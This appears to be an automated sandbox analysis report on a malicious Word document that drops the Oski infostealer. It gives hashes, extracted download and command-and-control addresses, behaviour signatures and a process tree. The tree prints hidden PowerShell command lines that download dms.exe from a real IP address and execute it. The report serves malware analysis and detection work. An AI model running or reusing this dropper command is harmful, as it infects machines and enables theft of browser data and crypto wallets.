Analysis
max time kernel: 142s
max time network: 145s
platform: windows7_x64
resource: win7v20210410
submitted: 02/08/2021, 08:55
Static task: static1
Behavioral task: behavioral1
  Sample: Swift Mesaji-20210802YPT21-150961.doc
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: Swift Mesaji-20210802YPT21-150961.doc
  Resource: win10v20210410
General
Target: Swift Mesaji-20210802YPT21-150961.doc
Size: 228KB
MD5: 0b45c5ecbbdcf6765b5528371029cdd0
SHA1: a02108313ffa4d961cc3f25e75d0b09feb170b8a
SHA256: c5a7de281ab02afc017d37a36f97b33e6487d67c9cfe4400a544f6b45890919b
SHA512: 0f726f9982eaf2d5898e3f4220b02b54ba3c6de254a5b4a963052e18b39e409b904c8a9e3103fc1d4c0ddd93e40cc7bc8ff70670a3c5d2aea641d11715fba71a
Malware Config
Extracted (download URL): httP://185.230.160.197/dms/dms.exe
Extracted (oski C2): http://2.56.59.226/www/
Signatures

Oski
Oski is an infostealer targeting browser data and crypto wallets.

Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1476 | 2004 | powershell.exe | 24
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1176 | 2004 | powershell.exe | 24
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 924 | 2004 | powershell.exe | 24
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Blocklisted process makes network request 1 IoCs
flow | pid | Process
6 | 1476 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE 6 IoCs
pid | Process
1916 | dms.exe
820 | dms.exe
384 | dms.exe
1736 | dms.exe
972 | dms.exe
1756 | dms.exe

Loads dropped DLL 1 IoCs
pid | Process
1476 | powershell.exe

Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 820 set thread context of 1736 | 820 | dms.exe | 43
PID 384 set thread context of 972 | 384 | dms.exe | 44
PID 1916 set thread context of 1756 | 1916 | dms.exe | 46

Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 9 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2004 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs
pid | Process
1476 | powershell.exe
1476 | powershell.exe
1176 | powershell.exe
924 | powershell.exe
1176 | powershell.exe
924 | powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1476 | powershell.exe
Token: SeDebugPrivilege | 1176 | powershell.exe
Token: SeDebugPrivilege | 924 | powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs
pid | Process
2004 | WINWORD.EXE
2004 | WINWORD.EXE
2004 | WINWORD.EXE
2004 | WINWORD.EXE
Suspicious use of WriteProcessMemory 61 IoCs
(identical rows are collapsed; the last column gives how many times each row appears in the report)
description | pid | Process | procid_target | occurrences
PID 2004 wrote to memory of 1476 | 2004 | WINWORD.EXE | 31 | 4
PID 2004 wrote to memory of 1176 | 2004 | WINWORD.EXE | 33 | 4
PID 2004 wrote to memory of 924 | 2004 | WINWORD.EXE | 35 | 4
PID 1476 wrote to memory of 1916 | 1476 | powershell.exe | 38 | 4
PID 1176 wrote to memory of 384 | 1176 | powershell.exe | 40 | 4
PID 924 wrote to memory of 820 | 924 | powershell.exe | 41 | 4
PID 2004 wrote to memory of 1052 | 2004 | WINWORD.EXE | 42 | 4
PID 820 wrote to memory of 1736 | 820 | dms.exe | 43 | 11
PID 384 wrote to memory of 972 | 384 | dms.exe | 44 | 11
PID 1916 wrote to memory of 1756 | 1916 | dms.exe | 46 | 11
Processes
(indentation shows the parent/child tree; each entry lists image path, PID, command line and the signatures that fired for it)

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (PID 2004)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Swift Mesaji-20210802YPT21-150961.doc"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1476)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\dms.exe  (PID 1916)
          Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Roaming\dms.exe  (PID 1756)
              Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
              - Executes dropped EXE

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1176)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"
      - Process spawned unexpected child process
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\dms.exe  (PID 384)
          Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Roaming\dms.exe  (PID 972)
              Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
              - Executes dropped EXE

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 924)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"
      - Process spawned unexpected child process
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\dms.exe  (PID 820)
          Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Roaming\dms.exe  (PID 1736)
              Command line: "C:\Users\Admin\AppData\Roaming\dms.exe"
              - Executes dropped EXE

    C:\Windows\splwow64.exe  (PID 1052)
      Command line: C:\Windows\splwow64.exe 12288